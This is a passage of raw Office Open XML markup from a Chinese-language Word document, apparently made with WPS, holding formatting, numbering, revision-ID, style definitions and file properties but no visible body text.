    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p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b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr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  <w:rPr>
                              <w:rFonts w:eastAsia="等线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g/nr5S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rPr>
                        <w:rFonts w:eastAsia="等线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</w:rPr>
      <w:tab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right"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="6350"/>
          <wp:docPr id="2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99160" cy="3594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FE08FD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="87FE08FD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5C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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>
    <w:nsid w:val="C73AE7DE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C73AE7D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DBA5B3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DBA5B3F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QyYmY4ZmQxMTU5YmUyYTFhNjE1ZTY3NDM4ZTdmODEifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="dc57c0f0-0213-4ccd-9bba-f1efe707baed"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="05D969B9"/>
    <w:rsid w:val="00007E81"/>
    <w:rsid w:val="00020E74"/>
    <w:rsid w:val="000E46FF"/>
    <w:rsid w:val="0011795E"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="002D3975"/>
    <w:rsid w:val="00314EA0"/>
    <w:rsid w:val="00362333"/>
    <w:rsid w:val="00371C4B"/>
    <w:rsid w:val="003C0E32"/>
    <w:rsid w:val="00434487"/>
    <w:rsid w:val="0044107D"/>
    <w:rsid w:val="00461E45"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004B7A08"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004D7EA5"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="0060568B"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="006456B2"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006462F0"/>
    <w:rsid w:val="006610A8"/>
    <w:rsid w:val="00675AD9"/>
    <w:rsid w:val="0069226B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006B4F06"/>
    <w:rsid w:val="006B6A47"/>
    <w:rsid w:val="006F7053"/>
    <w:rsid w:val="006F7304"/>
    <w:rsid w:val="007928D0"/>
    <w:rsid w:val="007F2E4D"/>
    <w:rsid w:val="00800969"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00831568"/>
    <w:rsid w:val="00834DDA"/>
    <w:rsid w:val="0085707A"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="009038AE"/>
    <w:rsid w:val="009269AA"/>
    <w:rsid w:val="00962385"/>
    <w:rsid w:val="00A0559E"/>
    <w:rsid w:val="00A37081"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AA7579"/>
    <w:rsid w:val="00AC28CD"/>
    <w:rsid w:val="00AE3D16"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B07F4C"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B70CE7"/>
    <w:rsid w:val="00BD6CED"/>
    <w:rsid w:val="00C8248B"/>
    <w:rsid w:val="00D01322"/>
    <w:rsid w:val="00DA752F"/>
    <w:rsid w:val="00DE0AAC"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E46C7A"/>
    <w:rsid w:val="00E65F9F"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00EB07E6"/>
    <w:rsid w:val="00EC1F55"/>
    <w:rsid w:val="00ED1B7F"/>
    <w:rsid w:val="00EF0DDF"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F41BC9"/>
    <w:rsid w:val="00F9587C"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09187C60"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="1CA218C3"/>
    <w:rsid w:val="24AF2DCF"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="2A35637C"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="4D8D36E8"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="58490869"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="662D3755"/>
    <w:rsid w:val="66AF3623"/>
    <w:rsid w:val="68185FB6"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6E9A5523"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="74433B97"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85C56"/>
    <w:rsid w:val="7A8B4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qFormat="1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iPriority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3">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left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1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact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qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr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cs="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-US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Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0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Cs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="19">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1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6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21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22">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23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24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25">
    <w:name w:val="明显参考1"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="16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37</Pages>
  <Words>7375</Words>
  <Characters>20189</Characters>
  <Lines>177</Lines>
  <Paragraphs>50</Paragraphs>
  <TotalTime>69</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22542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2024-07-25T05:55:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>王峥</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-25T12:55:42Z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413BE24BACE944E7A45ED5704BA013F7_13</vt:lpwstr>
  </property>
</Properties>
</file>